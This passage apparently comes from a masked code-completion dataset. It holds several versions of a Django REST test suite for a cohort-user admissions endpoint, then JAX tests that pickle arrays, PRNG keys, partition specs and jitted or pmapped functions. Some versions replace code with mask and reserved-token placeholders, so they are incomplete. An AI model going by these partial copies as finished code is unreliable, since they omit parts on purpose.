@patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 9999, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True, task=True,\n task_status='PENDING', task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'User has tasks with status pending the educational status cannot be GRADUATED'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Cannot be marked as `GRADUATED` if its financial status is `LATE`'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-4": "<mask token>\nimport re\nfrom unittest.mock import patch\nfrom django.urls.base import reverse_lazy\nfrom rest_framework import status\nfrom breathecode.tests.mocks import GOOGLE_CLOUD_PATH, apply_google_cloud_client_mock, apply_google_cloud_bucket_mock, apply_google_cloud_blob_mock\nfrom ..mixins import AdmissionsTestCase\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n \"\"\"Test /cohort/:id/user/:id\"\"\"\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n self.assertEqual(json, {'detail':\n 'Authentication credentials were not provided.', 'status_code':\n status.HTTP_401_UNAUTHORIZED})\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 999})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid user_id'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Specified cohort not be found'}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'id': model.cohort_user.id, 'role': model.cohort_user.\n role, 'educational_status': model.cohort_user.\n educational_status, 'finantial_status': model.cohort_user.\n finantial_status}\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': 9999})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': 9999, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, specialty_mode=True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True, task=True,\n task_status='PENDING', task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'User has tasks with status pending the educational status cannot be GRADUATED'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=\n True, profile_academy=True, cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={\n 'cohort_id': model.cohort.id, 'user_id': model.user.id})\n data = {'educational_status': 'GRADUATED', 'finantial_status': 'LATE'}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail':\n 'Cannot be marked as `GRADUATED` if its financial status is `LATE`'\n }\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-5": "\"\"\"\nTest /cohort/:id/user/:id\n\"\"\"\nimport re\nfrom unittest.mock import patch\nfrom django.urls.base import reverse_lazy\nfrom rest_framework import status\nfrom breathecode.tests.mocks import (\n GOOGLE_CLOUD_PATH,\n apply_google_cloud_client_mock,\n apply_google_cloud_bucket_mock,\n apply_google_cloud_blob_mock,\n)\nfrom ..mixins import AdmissionsTestCase\n\n\nclass CohortIdUserIdTestSuite(AdmissionsTestCase):\n \"\"\"Test /cohort/:id/user/:id\"\"\"\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_without_auth(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={'cohort_id': 1, 'user_id': 1})\n response = self.client.get(url)\n json = response.json()\n\n self.assertEqual(\n json, {\n 'detail': 'Authentication credentials were not provided.',\n 'status_code': status.HTTP_401_UNAUTHORIZED\n })\n self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True)\n url = reverse_lazy('admissions:cohort_id_user_id', kwargs={'cohort_id': 1, 'user_id': 1})\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid cohort_id'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': 999\n })\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'invalid user_id'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_bad_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_without_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id_but_with_user(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True, cohort=True, user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {}\n response = self.client.put(url, data)\n json = response.json()\n expected = {'status_code': 400, 'detail': 'Specified cohort not be found'}\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n specialty_mode=True,\n profile_academy=True,\n cohort_user=True)\n model_dict = self.get_cohort_user_dict(1)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.put(url, data)\n json = response.json()\n expected = {\n 'id': model.cohort_user.id,\n 'role': model.cohort_user.role,\n 'educational_status': model.cohort_user.educational_status,\n 'finantial_status': model.cohort_user.finantial_status,\n }\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n self.assertEqual(self.count_cohort_user(), 1)\n self.assertEqual(self.get_cohort_user_dict(1), model_dict)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_user_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n specialty_mode=True,\n profile_academy=True,\n cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': 9999\n })\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id_with_bad_cohort_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n specialty_mode=True,\n profile_academy=True,\n cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': 9999,\n 'user_id': model.user.id\n })\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_delete_with_id(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n specialty_mode=True,\n profile_academy=True,\n cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {'specialty_mode': model.specialty_mode.id}\n response = self.client.delete(url, data)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n self.assertEqual(self.count_cohort_user(), 0)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_task(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n profile_academy=True,\n cohort_user=True,\n task=True,\n task_status='PENDING',\n task_type='PROJECT')\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {\n 'educational_status': 'GRADUATED',\n }\n response = self.client.put(url, data)\n json = response.json()\n expected = {\n 'status_code': 400,\n 'detail': 'User has tasks with status pending the educational status cannot be GRADUATED',\n }\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n @patch(GOOGLE_CLOUD_PATH['client'], apply_google_cloud_client_mock())\n @patch(GOOGLE_CLOUD_PATH['bucket'], apply_google_cloud_bucket_mock())\n @patch(GOOGLE_CLOUD_PATH['blob'], apply_google_cloud_blob_mock())\n def test_cohort_id_user_id_put_with_unsuccess_finantial_status(self):\n \"\"\"Test /cohort/:id/user/:id without auth\"\"\"\n model = self.generate_models(authenticate=True,\n cohort=True,\n user=True,\n profile_academy=True,\n cohort_user=True)\n url = reverse_lazy('admissions:cohort_id_user_id',\n kwargs={\n 'cohort_id': model.cohort.id,\n 'user_id': model.user.id\n })\n data = {\n 'educational_status': 'GRADUATED',\n 'finantial_status': 'LATE',\n }\n response = self.client.put(url, data)\n json = response.json()\n expected = {\n 'status_code': 400,\n 'detail': 'Cannot be marked as `GRADUATED` if its financial status is `LATE`',\n }\n\n self.assertEqual(json, expected)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n",
"step-ids": [
9,
13,
14,
15,
16
]
}
|
[
9,
13,
14,
15,
16
] |
<|reserved_special_token_0|>
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1), jax.random.
key_data(k2))
@parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(
None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,
'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',
'y')),))
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CloudpickleTest(jtu.JaxTestCase):
<|reserved_special_token_0|>
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77)
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
k1 = jax.random.PRNGKey(72)
s = pickle.dumps(k1)
k2 = pickle.loads(s)
self.assertEqual(k1.dtype, k2.dtype)
self.assertArraysEqual(jax.random.key_data(k1), jax.random.
key_data(k2))
@parameterized.parameters((pxla.PartitionSpec(),), (pxla.PartitionSpec(
None),), (pxla.PartitionSpec('x', None),), (pxla.PartitionSpec(None,
'y'),), (pxla.PartitionSpec('x', 'y'),), (pxla.PartitionSpec(('x',
'y')),))
def testPickleOfPartitionSpecs(self, partition_spec):
restored_partition_spec = pickle.loads(pickle.dumps(partition_spec))
self.assertIsInstance(restored_partition_spec, pxla.PartitionSpec)
self.assertTupleEqual(partition_spec, restored_partition_spec)
def testPickleX64(self):
with jax.experimental.enable_x64():
x = jnp.array(4.0, dtype='float64')
s = pickle.dumps(x)
with jax.experimental.disable_x64():
y = pickle.loads(s)
self.assertEqual(x.dtype, jnp.float64)
self.assertArraysEqual(x, y, check_dtypes=False)
self.assertEqual(y.dtype, jnp.float32)
self.assertEqual(y.aval.dtype, jnp.float32)
self.assertIsInstance(y, type(x))
def testPickleTracerError(self):
with self.assertRaises(core.ConcretizationTypeError):
jax.jit(pickle.dumps)(0)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CloudpickleTest(jtu.JaxTestCase):
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfJittedFunctions(self):
@jax.jit
def f(x, y):
return x * y
@jax.jit
def g(z):
return f(z, z + 77)
expected = g(32)
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(32)
self.assertEqual(expected, actual)
@unittest.skipIf(cloudpickle is None, 'Requires cloudpickle')
def testPickleOfPmappedFunctions(self):
@jax.pmap
def f(x, y):
return x * y
@jax.pmap
def g(z):
return f(z, z + 77)
expected = g(jnp.asarray([[32]]))
s = cloudpickle.dumps(g)
del f, g
g_unpickled = pickle.loads(s)
actual = g_unpickled(jnp.asarray([[32]]))
self.assertEqual(expected, actual)
class PickleTest(jtu.JaxTestCase):
def testPickleOfDeviceArray(self):
x = jnp.arange(10.0)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
def testPickleOfDeviceArrayWeakType(self):
x = jnp.array(4.0)
self.assertEqual(x.aval.weak_type, True)
s = pickle.dumps(x)
y = pickle.loads(s)
self.assertArraysEqual(x, y)
self.assertIsInstance(y, type(x))
self.assertEqual(x.aval, y.aval)
@jtu.sample_product(prng_name=['threefry2x32', 'rbg', 'unsafe_rbg'])
def testPickleOfKeyArray(self, prng_name):
with jax.default_prng_impl(prng_name):
